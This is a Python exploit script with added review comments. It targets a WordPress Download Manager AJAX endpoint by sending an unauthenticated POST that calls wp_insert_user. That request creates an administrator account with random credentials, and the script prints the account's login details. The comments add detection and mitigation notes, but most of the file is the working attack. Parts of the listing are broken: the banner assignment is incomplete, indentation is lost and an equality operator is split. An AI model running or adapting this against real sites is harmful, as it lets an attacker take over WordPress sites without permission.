import optparse
import os
import random
import socket
import string
import sys
import urllib
import urllib2
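def checkurl(url):
    """Return *url* unchanged when it carries an explicit http/https scheme.

    The guard that preceded ``sys.exit(1)`` is missing from this listing,
    leaving an ``else`` with no ``if``. The scheme test below is rebuilt
    from the ``-t`` help text ("http[s]://...") and should be confirmed
    against the upstream file.

    Exits the process with status 1 for any other value.
    """
    # NOTE(review): reconstructed condition -- verify against the original.
    if not url.startswith(('http://', 'https://')):
        print('[X] Target must start with http:// or https://')
        sys.exit(1)
    return url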
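def checkfile(file):
    """Return *file* if it names an existing, readable regular file.

    Prints an error and exits the process with status 1 otherwise.
    """
    # Reject when EITHER test fails. The earlier `and` rejected only when
    # both failed, so a readable directory or an unreadable regular file
    # was handed back to the caller as if it were usable.
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] ' + file + ' file is missing or not readable')
        sys.exit(1)
    return file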
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Build a string of *size* characters, each drawn from *chars*.

    NOTE(review): `random` is not a cryptographic generator, so values
    produced here are predictable to anyone who can recover its state.
    The script below uses them as a login name and a password.
    """
    picked = [random.choice(chars) for _ in range(size)]
    return ''.join(picked)
# Script body: parses the command line, then sends one HTTP request to the
# target and reports the outcome. Indentation was lost in this listing.
# NOTE(review): the right-hand side of `banner` is missing from this listing.
banner =
# Command line: -t/--target is required; --timeout is an int, default 10.
commandList = optparse.OptionParser( 'usage: %prog -t URL [--timeout sec]' )
commandList.add_option( '-t' , '--target' , action = "store" ,
help = "Insert TARGET URL: http[s]://www.victim.com[:PORT]" ,
)
commandList.add_option( '--timeout' , action = "store" , default = 10 , type = "int" ,
help = "[Timeout Value] - Default 10" ,
)
options, remainder = commandList.parse_args()
# Without a target: show the banner and usage, then exit with status 1.
if not options.target:
print (banner)
commandList.print_help()
sys.exit( 1 )
host = checkurl(options.target)
timeout = options.timeout
print (banner)
# The timeout applies to every socket opened after this call.
socket.setdefaulttimeout(timeout)
# Login name and password are random 6-character alphanumeric strings.
username = id_generator()
pwd = id_generator()
# Form body of the request. It names the AJAX action `wpdm_ajax_call`, asks
# it to run `wp_insert_user`, and supplies role `administrator`; no cookie,
# nonce or other credential is sent with it.
# NOTE(review): presumably the server-side handler dispatches to the function
# named in `execute` without an authentication or capability check -- confirm
# against the plugin code that registers the action.
# Detection: this parameter combination in a request body is the stable
# indicator; also review administrator accounts with 6-character
# alphanumeric logins.
# Mitigation belongs server-side: the handler must not call caller-named
# functions and must enforce a capability check and nonce.
body = urllib.urlencode({ 'action' : 'wpdm_ajax_call' ,
'execute' : 'wp_insert_user' ,
'user_login' : username,
'user_pass' : pwd,
'role' : 'administrator' })
# Fixed browser-like User-Agent; a weak indicator, since it is a plain
# constant that can be edited.
headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' }
print "[+] Tryng to connect to: " + host
try :
# A Request built with a data argument is sent as POST; the URL is the site
# root (host + "/"), not an admin path.
req = urllib2.Request(host + "/" , body, headers)
response = urllib2.urlopen(req)
html = response.read()
# NOTE(review): `= =` is a split `==` from extraction. An empty response body
# is the only success test; the script never checks that the account exists.
if html = = "":
print ( "[!] Account Added" )
print ( "[!] Location: " + host + "/wp-login.php" )
print ( "[!] Username: " + username)
print ( "[!] Password: " + pwd)
else :
print ( "[X] Exploitation Failed :(" )
# HTTP status errors and connection failures are printed, not re-raised.
except urllib2.HTTPError as e:
print ( "[X] " + str (e))
except urllib2.URLError as e:
print ( "[X] Connection Error: " + str (e))